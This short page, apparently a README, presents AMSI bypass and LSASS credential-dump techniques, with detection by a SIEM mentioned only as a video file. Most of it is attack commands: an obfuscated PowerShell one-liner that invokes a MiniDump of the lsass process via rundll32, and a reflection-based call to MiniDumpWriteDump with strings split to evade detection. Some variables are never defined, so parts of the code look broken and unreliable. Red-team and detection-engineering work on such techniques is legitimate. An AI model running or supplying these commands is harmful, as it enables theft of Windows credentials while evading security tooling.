Execution Bypass AMSI and Lsass Dump Attacks and detection by SIEM
Run file in powershell and then execute below command : 'AmsiUtils'
Lsass Dump via mini dump needs to run as admin access
Minidump.exe
&$env:???t??r???*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???*2\c?m?[v-w]l | % {$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999999999999999999999999976-decoy $(gps l?as).id c:\parastoo.tmp full; Wait-Process -Id (Get-Process rundll32).id ; (Get-Item -Path c:\dmp.tmp).Encrypt();
1-Crete temp folder in drive C:
2-Execute below commands in powershell
$S = "C:\temp" $P = (Get-Process lsass) $A = [PSObject].Assembly.GetType('Syst'+'em.Manage'+'ment.Autom'+'ation.Windo'+'wsErrorRe'+'porting') $B = $A.GetNestedType('Nativ'+'eMethods', 'Non'+'Public') $C = [Reflection.BindingFlags] 'NonPublic, Static' $D = $B.GetMethod('MiniDum'+'pWriteDump', $C) $F = New-Object IO.FileStream($PDP, [IO.FileMode]::Create) $R = $D.Invoke($null, @($P.Handle,$G,$F.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero)) $F.Close()
lsass.dump-detection-short.mp4
See below link to view execution